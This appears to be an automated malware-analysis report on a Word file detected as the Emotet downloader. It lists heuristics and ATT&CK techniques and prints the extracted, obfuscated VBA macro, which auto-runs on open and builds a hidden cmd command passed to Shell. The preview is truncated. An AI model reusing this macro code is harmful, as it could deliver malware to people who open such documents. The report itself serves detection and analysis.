MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6883981-0', strongly suggesting the Emotet family. The presence of an 'AutoOpen' VBA macro indicates that the malicious code will execute automatically upon opening the document. The macro's primary function appears to be downloading and executing a second-stage payload, a common Emotet behavior.
Heuristics 5
-
ClamAV: Doc.Downloader.Emotet-6883981-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6883981-0
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5429 bytes |
SHA-256: a11b42997d0c8ece0e17f277ba94f87f7c67ab89df97624e4e4ce9aca4e81e4c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "tXlizQSSzY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
On Error Resume Next
AppActivate CBool(ZRzsM)
AppActivate Sqr(7)
AppActivate CrPOsb
AppActivate 1
AppActivate 1662
AppActivate Cos(fssjD)
Shell@ CVar("cm") + ihuqhQuijio + qAkQflEPwVAqn + qXknZ + vqAAbELQ + SVwszaX + JlwkfOnHKiQ + jlYNfMtztiW, 233501883 - 233501883
AppActivate zHfTH
AppActivate CInt(1)
AppActivate wLnFav
End Sub
Attribute VB_Name = "dzGMDMHIpFOu"
Function qXknZ()
On Error Resume Next
AppActivate 233219740
AppActivate 263
AppActivate fqqjNh
PIZqLj = "d /V" + "/C" + CStr(Chr(IYjHQqvTwKzsR + EUjARtWjo + 34 + FSWcHnSd + YzYOFkpGiYZhGW)) + "set W" + "cj" + "=SwTE" + "GIC" + "sLC" + "z" + "sl" + "AbzRtCbT" + "b" + "RDvB+83od"
AppActivate RjvRM
AppActivate zSrjFU
ZTDDpaKHAzT = "\M;JNY}" + ")" + "0u:W7n" + "=pj.(hyPF" + "g1" + " 'akxicqQ{" + "@" + "$f,5me6-" + "r"
AppActivate CDate(AsVIm)
AppActivate pJiWKW
LCOmVtqU = "9" + "/&&for %" + "E in (" + "4" + "6;29;1;7"
AppActivate Round(oXldO)
AppActivate wbownC
AppActivate jqvYY
iWBAWFDd = "2;75;1" + "1;50;" + "72;12" + ";12;56;" + "67;1" + "5;61;44;"
AppActivate vuZQUv
AppActivate CDate(21907 + 90226)
CmiJdS = "45" + ";" + "44;72;1" + ";74;2" + "9;" + "21;47;72;" + "62;1" + "7;" + "56;35;72"
AppActivate 9
AppActivate 106517236
AppActivate WDBmsV
MwlOo = ";17;48;42;" + "72;21;" + "18;12;6" + "1;72" + ";" + "44;" + "17;" + "33;67;61"
AppActivate Log(GUhoR)
AppActivate MwhjsC
YHFNi = ";63;17;" + "45;57;50;1" + "7;17" + ";46;41;77;" + "77" + ";7" + "5;72;44;" + "30;58;1" + "2;1" + "2" + ";54;75;2" + "9;40;46;" + "48;62;29"
AppActivate RzMqWI
AppActivate CInt(437052425)
IGitP = ";71;77" + ";36;12" + ";62;7" + "0;68" + ";66;50;1" + "7;17;4" + "6;41" + ";" + "77;77;5" + "8;54"
qXknZ = PIZqLj + ZTDDpaKHAzT + LCOmVtqU + iWBAWFDd + CmiJdS + MwlOo + YHFNi + IGitP
AppActivate CLng(476)
AppActivate CStr(wnGXU)
AppActivate Sgn(uljLhH)
End Function
Function vqAAbELQ()
On Error Resume Next
AppActivate CStr(92443 - iatow - PiizMf / zZhTup)
AppActivate CSng(bMdAn)
NmlnMYI = ";72;44;" + "15;58;55;7" + "0" + ";4" + "8;58;"
AppActivate uczwEj
AppActivate kkHzj
AppActivate CByte(200)
bwTJbFU = "51" + ";1" + "5" + ";48;46" + ";12" + ";77;52;5" + "1;1;66;50" + ";17;17;" + "4" + "6;41;77;" + "77;11;29;6" + "8;17;46;29" + ";1;72;75;4"
AppActivate mtGiz
AppActivate CDbl(zXctW - OZbnwh)
kpBuOnWsvH = "8;21;72;7" + "7;0;34;28;" + "17;76;64" + ";27;66;" + "50;1" + "7;17;46;41" + ";77;"
AppActivate jFNYz
AppActivate CByte(Kwrqc + 91209 / AsQabp + iiVKOX)
OPUTVtFlSSf = "7" + "7;4" + "4" + ";58" + ";44;58;" + "11;21;12;2" + "9;54;48" + ";21;72;77;" + "50;66;5" + "0;17;17;" + "46;41;77;7"
AppActivate hSzMd
AppActivate CBool(330)
RdFwMLbjY = "7;" + "2" + "7;2" + "7;39;3" + "9" + ";" + "75"
AppActivate CByte(36118 * bufGRW - KXMoz / ftOmcE)
AppActivate HuwsI
AppActivate Int(5)
YCPAzjWE = ";40;11" + ";48;75;40;" + "77;28;30" + ";58;42;57" + ";48;0" + ";46;12" + ";61;17;49" + ";57;66;" + "57;38" + ";33" + ";67;34;8"
AppActivate ChrW(4)
AppActivate 467240634
AppActivate 4346
mwSjH = ";25;56" + ";45;56;57;" + "43;73;7" + "0;" + "57;33;67" + ";47;7"
AppActivate Chr(131)
AppActivate 8
AppActivate Log(csWEww)
iMHEPpL = "1;8;45;67;" + "72" + ";44;24;4" + "1;17;72;7" + "1;46" + ";2" + "6;57;31;57" + ";"
AppActivate koTTPO
AppActivate 13
irjcwUD = "26;6" + "7;34;8;25" + ";26;57;48" + ";72;60;72;" + "57;33;6" + "8;2" + "9;75;72;5" + "8;62;50;"
vqAAbELQ = NmlnMYI + bwTJbFU + kpBuOnWsvH + OPUTVtFlSSf + RdFwMLbjY + YCPAzjWE + mwSjH + iMHEPpL + irjcwUD
AppActivate Oct(37)
AppActivate Sqr(FqXkBB / 75385 / KnjCB * lIUIU)
AppActivate ChrB(fUAhO)
End Function
Function SVwszaX()
On Error Resume Next
AppActivate 16
AppAct
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.